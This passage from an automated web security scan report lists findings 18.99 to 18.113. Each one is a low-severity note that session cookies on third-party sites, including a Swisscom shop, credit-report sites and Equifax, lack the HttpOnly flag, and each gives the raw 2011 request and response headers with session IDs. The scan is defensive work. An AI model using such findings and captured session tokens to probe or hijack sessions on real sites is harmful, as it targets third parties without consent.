Path:   /onlineshop/images/content/promo_teaser/promotional/Siemens_Gigaset_SL400_EN.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/promo_teaser/promotional/Siemens_Gigaset_SL400_EN.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=23B9CBC33BD0095AAE29E5942B302FD9; Path=/
Cache-Control: max-age=18000
Last-Modified: Tue, 03 Aug 2010 13:18:20 GMT
Accept-Ranges: bytes
ETag: "2923a457e33cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/jpeg
Connection: close
Content-Length: 23898

......JFIF.....d.d......Ducky.......A.....XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...
...[SNIP]...

18.99. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/teaser/185x250px_O-Shop_DataDay_en.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/promo_teaser/teaser/185x250px_O-Shop_DataDay_en.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/promo_teaser/teaser/185x250px_O-Shop_DataDay_en.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:26 GMT
Set-Cookie: JSESSIONID=4FBD532C45621BBE076F6ACFC4049D3A; Path=/
Cache-Control: max-age=18000
Last-Modified: Thu, 03 Feb 2011 15:01:57 GMT
Accept-Ranges: bytes
ETag: "df8484db3c3cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/jpeg
Connection: close
Content-Length: 50681

......JFIF.....d.d......Ducky.......d....~http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.
...[SNIP]...

18.100. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/teaser/broschuere_zuhauseverbunden_en.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/promo_teaser/teaser/broschuere_zuhauseverbunden_en.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/promo_teaser/teaser/broschuere_zuhauseverbunden_en.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=3F0A76D9FC3221B8CABDDC98399D45B0; Path=/
Cache-Control: max-age=18000
Last-Modified: Tue, 20 Oct 2009 13:19:08 GMT
Accept-Ranges: bytes
ETag: "06e82e78751ca1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/jpeg
Connection: close
Content-Length: 23699

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

18.101. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/teaser/dsl_neuanschluesse_en.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/promo_teaser/teaser/dsl_neuanschluesse_en.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/promo_teaser/teaser/dsl_neuanschluesse_en.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:26 GMT
Set-Cookie: JSESSIONID=CE541738F35A68A838240280C89BF974; Path=/
Cache-Control: max-age=18000
Last-Modified: Thu, 16 Apr 2009 14:34:58 GMT
Accept-Ranges: bytes
ETag: "0154684a0bec91:27ce"
X-Powered-By: ASP.NET
Content-Type: image/jpeg
Connection: close
Content-Length: 46796

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Macintosh.2009:04:16 16:47:26.......
...[SNIP]...

18.102. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/site/icons/space.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/site/icons/space.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/site/icons/space.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:49 GMT
Set-Cookie: JSESSIONID=66B54CAFC1BBE9BD5ECD1168DE0281D1; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 16 Jun 2004 14:07:08 GMT
Accept-Ranges: bytes
ETag: "08ec735ab53c41:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 43

GIF89a.............!.......,...........D..;

18.103. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/watermark.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/watermark.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/watermark.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:55:56 GMT
Set-Cookie: JSESSIONID=10894D6FB979F84F3CB3000992ABB756; Path=/
X-Powered-By: ASP.NET
Content-Type: text/html
Connection: close
Content-Length: 327

<html>
<script language="JavaScript">top.location.replace( "http://www.swisscom.ch/fxres/asp/error/oshop/oshop_error.htm")</script>
<script language="JavaScript">top.location.href="htt
...[SNIP]...

18.104. http://t1.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t1.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.actividentity.com/device_identification_for_user_authentication%3Fgclid%3DCNnXlJP1tagCFQ5-5Qodm1pYEg&i=10367 HTTP/1.1
Host: t1.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.actividentity.com/device_identification_for_user_authentication?gclid=CNnXlJP1tagCFQ5-5Qodm1pYEg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sun, 24 Apr 2011 19:56:35 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t1.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eactividentity%2Ecom%2Fdevice%5Fidentification%5Ffor%5Fuser%5Fauthentication%3Fgclid%3DCNnXlJP1tagCFQ5%2D5Qodm1pYEg; expires=Mon, 25-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCQRCADDQ=IDCILCEAINFPMNHIKEJDHDMO; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t1.trackalyzer.com/0.gif">here</a>.</body>

18.105. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.customscoop.com/free-trial%3Fctt_id%3D8402315%26ctt_adnw%3DGoogle%26ctt_ch%3Dps%26ctt_entity%3Dtc%26ctt_cli%3D8x16337x264583x1756421%26ctt_kw%3Dreputation%2520monitoring%26ctt_adid%3D6182319610%26ctt_nwtype%3Dsearch%26_kk%3Dreputation%2520monitoring%26_kt%3D95b73c39-c203-439c-bdad-698c73ef9306%26gclid%3DCKah4dm1tqgCFQFM5QodD3KkCw&i=19036 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.customscoop.com/free-trial?ctt_id=8402315&ctt_adnw=Google&ctt_ch=ps&ctt_entity=tc&ctt_cli=8x16337x264583x1756421&ctt_kw=reputation%20monitoring&ctt_adid=6182319610&ctt_nwtype=search&_kk=reputation%20monitoring&_kt=95b73c39-c203-439c-bdad-698c73ef9306&gclid=CKah4dm1tqgCFQFM5QodD3KkCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 00:33:46 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Ecustomscoop%2Ecom%2Ffree%2Dtrial%3Fctt%5Fid%3D8402315%26ctt%5Fadnw%3DGoogle%26ctt%5Fch%3Dps%26ctt%5Fentity%3Dtc%26ctt%5Fcli%3D8x16337x264583x1756421%26ctt%5Fkw%3Dreputation%2520monitoring%26ctt%5Fadid%3D6182319610%26ctt%5Fnwtype%3Dsearch%26%5Fkk%3Dreputation%2520monitoring%26%5Fkt%3D95b73c39%2Dc203%2D439c%2Dbdad%2D698c73ef9306%26gclid%3DCKah4dm1tqgCFQFM5QodD3KkCw; expires=Mon, 25-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSCRDRRDT=HIGDOPLBDLJIGODICLJDMDNI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

18.106. http://t4.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t4.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.infusionsoft.com/&i=12151 HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 01:37:00 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t4.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Einfusionsoft%2Ecom%2F; expires=Mon, 25-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSAARACBQ=NLAPAODALBEAGGLIHLCFGAAH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t4.trackalyzer.com/0.gif">here</a>.</body>

18.107. http://www.actividentity.com/inc/securimage/securimage_show.phpx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc/securimage/securimage_show.phpx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/securimage/securimage_show.phpx HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
Referer: http://www.actividentity.com/device_identification_for_user_authentication?gclid=CNnXlJP1tagCFQ5-5Qodm1pYEg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2knt766ulmukoda54fr91gtu97; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 19:44:45GMT
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: image/png
Content-Length: 578

.PNG
.
...IHDR.......2.....d?|r....PLTE...===... P..4.S....IDATH......0...HH(.....S...jT.a....^...F.?..N7..    X.`7....4.O....,7w.CV..........-9j%...\....Hj":..3.-.,.u.rk...I.Y....L...!...z..D..l..,.jd
...[SNIP]...

18.108. http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.credit.com
Path:   /r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order HTTP/1.1
Host: www.credit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:09:32 GMT
Server: Apache/2
Cache-Control: private, max-age=180
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Location: https://www.truecredit.com/products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-275c2775175765385a21
Content-Length: 193
Set-Cookie: crc=; path=/; expires=Mon, 25-Apr-2011 20:09:32 GMT
Set-Cookie: cuc=1303675772884*http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order; path=/; expires=Mon, 25-Apr-2011 20:09:32 GMT
Set-Cookie: ex=275c2775; domain=.credit.com; path=/
Set-Cookie: JSESSIONID=cab5ARwscbhOo4K6zij_s; domain=credit.com; path=/
Expires: Sun, 24 Apr 2011 20:12:32 GMT
Content-Type: text/plain

The URL has moved <a href="https://www.truecredit.com/products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-275c2775175765385a21">here</a>

18.109. http://www.creditchecktotal.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.creditchecktotal.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=x4zbvabzgzdycrflbd4d0v45; path=/
Set-Cookie: MachineName=IRC-P2WEB-10; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:44:32 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=14de7c2848a84999b4ce3923077a0e89; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServercreditchecktotal-web-pool=175001098.22559.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:44:32 GMT
ETag: "pvfeb653d6c4d0585e8fe51aef370bb345"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70584.RA0.G11456.U39967030].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 8633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

18.110. http://www.creditreport.com/dni/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.creditreport.com
Path:   /dni/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=dtlx5xigzesuxs45sncgr0a2; path=/
Set-Cookie: MachineName=IRC-P2WEB-46; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: OriginalReferrer=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=default; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:54:43 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavFlowID=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=d8dcfc475bed4dc18fed24f42706ace5; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: BIGipServercreditreport-web-pool=177360394.39455.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:54:43 GMT
ETag: "pveaedd7f407396a03b0b796d1384394a7"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UEC7B40B0].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 13074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>
           Credit Report and Credit History | Credit Rep
...[SNIP]...

18.111. http://www.dictof.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dictof.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with w
...[SNIP]...

18.112. http://www.echomail.com/pricing/pricing_sm.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.echomail.com
Path:   /pricing/pricing_sm.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pricing/pricing_sm.asp HTTP/1.1
Host: www.echomail.com
Proxy-Connection: keep-alive
Referer: http://echomail.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20441063.1303692234.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20441063.944278103.1303692234.1303692234.1303692234.1; __utmc=20441063; __utmb=20441063.3.10.1303692234

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 257433
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQTTABCB=BKLNDKCCCNEDBOJHCNNAFNFD; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 01:30:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>EchoMail - E-Mail & Social Media Marketing, Monitoring and Management | Pricing | Small Business</title>
   <he
...[SNIP]...

18.113. https://www.econsumer.equifax.com/otc/landing.ehtml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/landing.ehtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /otc/landing.ehtml?%255estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a%2bidentity%2btheft%2bresource_ordering34--2011-04-23--20-10-04CD1 HTTP/1.1
Host: www.econsumer.equifax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 03:12:19 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=857e5247922609777fdaaf17d37b; Path=/otc; Secure
Set-cookie: JROUTE=ush2; Path=/otc; Secure
Content-Length: 76392


